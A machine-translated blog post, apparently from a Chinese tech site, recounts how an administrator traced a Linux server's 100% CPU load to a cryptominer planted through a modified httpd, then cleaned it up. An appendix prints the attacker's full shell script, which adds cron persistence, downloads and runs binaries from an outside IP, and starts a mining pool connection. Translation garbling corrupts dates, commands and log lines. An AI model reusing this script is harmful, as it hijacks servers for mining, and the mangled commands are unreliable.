In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-06 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Servers >
Share
Shulou(Shulou.com)05/31 Report--
Most people don't quite understand the knowledge points of this article "what is the cpu repair method of Linux system?", so the editor summarizes the following content, detailed content, clear steps, and has a certain reference value. I hope you can gain something after reading this article. Let's take a look at this article "what is the 100% repair method of Linux system cpu?"
Case background:
Linux host CPU% for three consecutive days
How to deal with it:
1. Log in to the server to check the log of those three days in / var/log/messages+/var/log/messages.1+/var/log/messages.3.
2. There is no useful information in dmesg.
3. At this point, it is suspected that he has been attacked. It is natural to look at the bandwidth usage at the corresponding point in time. After checking, it is found that everything is normal. Continue to check.
4. It is suspected that there is an exception in a certain program. First of all, the web process is checked. The abnormal phenomenon is found through the erorr_log of httpd. The httpd program has been modified, and the script executed is the shell script in the appendix.
2014-09-0319 KB/s 1950 (124)-"plm" saved [26587 hand 26587]
FINISHED--2014-09-03 1914 Rose 1950 Murray-
Downloaded:1 files, 26K in 0.2s (124KB/s)
+ perlplm
+ rm-rfplm
+ chmod+x apache
+ chmod+x apache-ssl
+ + ps x
+ + grep-v grep
+ + awk' {print $1}'
+ + grep stratum
+ kill-9
Kill:usage: kill [- s sigspec |-n signum |-sigspec] pid | jobspec. Or kill-l [sigspec]
+ killall-9 kav M32 M64 apache apache-ssl
Kav: noprocess killed
M32: noprocess killed
M64: noprocess killed
Apache:no process killed
Apache-ssl:no process killed
+ PATH=.
+ apache-c httpd.conf
A.sh:./apache: / lib/ld-linux.so.2: bad ELF interpreter: No such file or directory
[root@iZ23vqwi2k5Z~] # + PATH=.
+ apache-ssl-c httpd.conf
[2014-09-0319 1915] Starting Stratum on stratum+tcp://80.240.137.183:3333/
[2014-09-0319 1950] 2 miner threads started, using 'scrypt' algorithm.
[2014-09-0319 1915] Binding thread 0 to cpu 0
[2014-09-0319 Binding thread 1915] to cpu 1
[2014-09-0319 1951] Stratum detected new block
[2014-09-0319 Suzhou 2002] Stratum detected new block
[2014-09-03 19:22:53] Stratum detected new block
5. On Aliyun's test machine, by running this script, during the test run, the content of the cpu lasting 100% error_log on httpd is basically the same as that on the client machine (it seems that the hacker whose basic skills have not been done well, his ass has not been wiped clean) has completely located the problem, and it is suspected that the server web program has been modified to do bad things (suspected mining)
6. the idea of clearing the abnormal process, and make a rough guess according to the content of the script.
(1) the first thing that comes to mind is to delete the exception directory file
# rm-rf / dev/shm/* (delete)
(2) ps to the specific process kill
# Ps aux | grep apche
# root 1615 199 0.1 314992 4200 pts/0 Sl 19:19 37:38 apache-ssl-chttpd.conf
# pkill-9 apache
# ps aux | grep apache | awk'{print $2}'| xargs kill-9 (delete malicious process)
(3) after the execution of the above operation, it is found that the abnormal directory file is generated again, and the apache-ssl process starts again. Check the script for the operation on cron, empty the cron, and execute the action above again.
# crontab-l
* / dev/shm/update > / dev/null 2 > & 1
(4) try to restart the httpd process and find it failed. Check the log is the exception of the configuration file. Check the backup file of bak in httpd.conf. Conscience hacker, do not forget to back up the file to the customer first.
# pwd
/ alidata/server/httpd/conf
# cp httpd.conf.bak httpd.conf
# / etc/init.d/httpd start (this step resumes the httpd process)
7. Appendix the shell content of malicious users
#! / bin/sh
Crontab-r
Cd/dev/shm
Rm-rf astatc * update*
Pwd > mech.dir
Dir=$ (catmech.dir)
Echo "* $dir/update > / dev/null 2 > & 1" > cron.d
Crontabcron.d
Crontab-l | grep update
Wget 173.255.212.191/update > > / dev/null & &
Curl-O http://173.255.212.191/update > > / dev/null & &
Chmod u+xupdate
# chattr-ia bash
# chattr-ia *
Curl-O http://173.255.212.191/apache
Curl-O http://173.255.212.191/apache-ssl
Crul-O http://173.255.212.191/httpd.conf
Wget173.255.212.191/httpd.conf
Wget http://173.255.212.191/apache
Wget http://173.255.212.191/apache-ssl
Wget wget http://173.255.212.191/plm
Perl plm
Rm-rfplm*
Chmod + xapache
Chmod + xapache-ssl
# kill-9`ps x | grep miner | grep-v grep | awk'{print $1}'`
Kill-9`ps x | grep stratum | grep-v grep | awk'{print $1}'`
Killall-9 kav m32 m64 apache apache-ssl
PATH= "." apache-c httpd.conf &
PATH= "." apache-ssl-c httpd.conf &
# chattr+ia bash
# chattr + ia sh
The above is the content of this article on "what is the 100% repair method of cpu in Linux system". I believe you all have a certain understanding. I hope the content shared by the editor will be helpful to you. If you want to know more about the relevant knowledge, please follow the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.